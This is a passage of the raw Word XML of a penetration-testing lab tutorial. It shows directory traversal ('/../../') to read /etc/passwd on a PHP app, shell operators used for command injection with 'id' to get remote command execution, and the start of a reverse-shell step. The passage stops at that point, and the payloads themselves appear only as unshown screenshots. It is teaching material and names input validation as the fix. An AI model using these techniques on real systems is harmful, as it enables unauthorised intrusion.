                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF05154" w14:textId="483B781E" w:rsidR="00874D05" w:rsidRDefault="00874D05"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However, it’s not providing that file. It gave no output. We know it isn’t a “permission” issue. Not only is the admin name and id broken. But /etc/passwd is a world readable (all users can access it), so it’s not a permission issue. It must be a location address issue from what we are typing in. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286244C2" w14:textId="39C10C5A" w:rsidR="00874D05" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Basically,</w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are typing the address for the file in wrong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way… or not in the clever way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139EE08" w14:textId="72C7654D" w:rsidR="00874D05" w:rsidRPr="004B17CD" w:rsidRDefault="00874D05" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 6. Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A19EC8" w14:textId="6C434714" w:rsidR="00874D05" w:rsidRDefault="004B17CD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Typing out long directory addresses can be tedious and easy to make errors, so by using “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/../” as a filler, linux will automatically find the directory we are looking for if used correctly, see below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715FF972" w14:textId="494AA8ED" w:rsidR="004B17CD" w:rsidRDefault="004B17CD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503F584D" wp14:editId="5EB04905">
            <wp:extent cx="4162425" cy="1168236"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="282741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1864" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4176048" cy="1172060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79695B88" w14:textId="39E39821" w:rsidR="004B17CD" w:rsidRDefault="004B17CD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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we just do the same in our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75094C35" w14:textId="12927AB2" w:rsidR="004B17CD" w:rsidRDefault="004B17CD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1879A973" wp14:editId="47F9A349">
            <wp:extent cx="5943600" cy="1309370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1806544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4885" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1309370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF9BD8" w14:textId="5481027F" w:rsidR="004B17CD" w:rsidRDefault="004B17CD"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And…. Success: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BAF9F3" w14:textId="25AF2D61" w:rsidR="004B17CD" w:rsidRDefault="004B17CD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B17CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6CB0D6" wp14:editId="4F07C124">
            <wp:extent cx="5943600" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108550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07149" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92584D" w14:textId="59E19F3B" w:rsidR="004B17CD" w:rsidRDefault="004B17CD"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(This is a medium to high vulnerability, it gives all the user accounts, and that’s half the battle. Remember to record this in your report, this would be a directory traversal vulnerability, the fix for it would be input validation and sanitization) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F309A" w14:textId="3EB1A0E7" w:rsidR="0047632A" w:rsidRPr="006231BD" w:rsidRDefault="006231BD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(sub)</w:t>
      </w:r>
      <w:r w:rsidR="0047632A" w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 7</w:t>
      </w:r>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Managing Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E1433" w14:textId="77777777" w:rsidR="006231BD" w:rsidRDefault="006231BD" w:rsidP="006231BD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In penetration testing you’ll run multiple commands at once, and/or want commands to operate logically, this is where operators come in: </w:t>
      </w:r>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">“ ;, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>||, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to name a few. Here is what they do in simple terms: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98E796" w14:textId="2C03510B" w:rsidR="006231BD" w:rsidRPr="006231BD" w:rsidRDefault="006231BD" w:rsidP="006231BD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for a sequence of commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F92B8D" w14:textId="7D4D0E5C" w:rsidR="006231BD" w:rsidRPr="006231BD" w:rsidRDefault="006231BD" w:rsidP="006231BD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for a fallback command if the first one fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3418C9" w14:textId="102CE001" w:rsidR="006231BD" w:rsidRDefault="006231BD" w:rsidP="006231BD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for a follow-up command if the first one succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45173598" w14:textId="1D27917C" w:rsidR="006231BD" w:rsidRPr="001A5270" w:rsidRDefault="006231BD" w:rsidP="006231BD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 8.Command Line Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690105DD" w14:textId="772B3032" w:rsidR="004B17CD" w:rsidRDefault="006231BD"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How would we use this in </w:t>
      </w:r>
      <w:r w:rsidR="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> app? The command “id” is used to display user and group information for a process or file. </w:t>
      </w:r>
      <w:r w:rsidR="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if were to use that in conjunction “;” with the files we want to access, we would see: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C47B4C" w14:textId="188BDAF9" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485C2E5D" wp14:editId="2FD2245D">
            <wp:extent cx="4914900" cy="1230300"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="147914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0650" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4924422" cy="1232684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A1ACFD" w14:textId="71BFBBA3" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Or simply the command itself:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E417FEE" w14:textId="665069B7" w:rsidR="006231BD" w:rsidRDefault="006231BD" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006231BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F4852C" wp14:editId="69581F23">
            <wp:extent cx="4743450" cy="583809"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="5816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04775" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4771810" cy="587299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70806820" w14:textId="79ABD171" w:rsidR="008E7D6B" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remote Command Execution (RCE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A5270">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it is exactly what we are going for in penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C86E82" w14:textId="67ADC321" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can RCE now. That means you can finally make a Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A77B19" w14:textId="4FED3F29" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 9. Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF461D3" w14:textId="5A4FC46F" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remember the three-part process:</w:t>
      </w:r>
    </w:p>
